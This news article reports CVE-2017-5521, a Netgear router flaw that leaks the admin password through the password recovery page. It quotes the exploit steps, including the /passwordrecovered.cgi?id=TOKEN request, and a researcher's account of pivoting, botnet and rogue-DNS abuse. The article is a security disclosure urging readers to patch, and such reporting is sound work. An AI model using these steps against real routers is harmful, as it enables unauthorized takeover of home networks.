Not again, Netgear. Another serious security vulnerability has been found on a bunch of Netgear routers. This time around, the bug can expose router login passwords and can be exploited remotely. Here's a list of Netgear routers that are affected and where to get the firmware patches for each of them.
The new vulnerability (CVE-2017-5521) was discovered by a researcher from Trustwave's SpiderLabs. It allows hackers to obtain the admin password for the router through a flaw in the password recovery process. According to the CVE description:
"When trying to access the web panel, a user is asked to authenticate; if the authentication is cancelled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router."
As mentioned, the bug is only exploitable if password recovery isn't enabled. However, if password recovery is off and remote management is enabled, the security flaw can be exploited remotely. The Remote management feature is turned off by default but can be turned on by users when they access Advanced Settings.
The vulnerability has been rated High based on CVSS 3.0 and Medium based on CVSS 2.0, but the SpiderLabs researcher stressed that the bug is very serious as it affects a large number of Netgear router models.
"We have found more than ten thousand vulnerable devices that are remotely accessible. The real number of affected devices is probably in the hundreds of thousands, if not over a million," the researcher said in a blog post. "As many people reuse their password, having the admin password of the router gives us an initial foothold on the network. We can see all the devices connected to the network and try to access them with that same admin password.
"With malware such as the Mirai botnet being out there, it is also possible that some of the vulnerable routers could be infected and ultimately used as bots as well. If running a bot is not possible, the DNS can be easily changed to a rogue one, as described by Proofpoint, to further infect machines on the network."
While the major vulnerability that was revealed in December last year was left unfixed for a while, this time around patches are readily available. Here's a list of affected Netgear routers and you can click on each of them to get the corresponding firmware patch:
- C6300 (firmware released to ISPs)
If your Netgear router is affected, get the firmware updates now.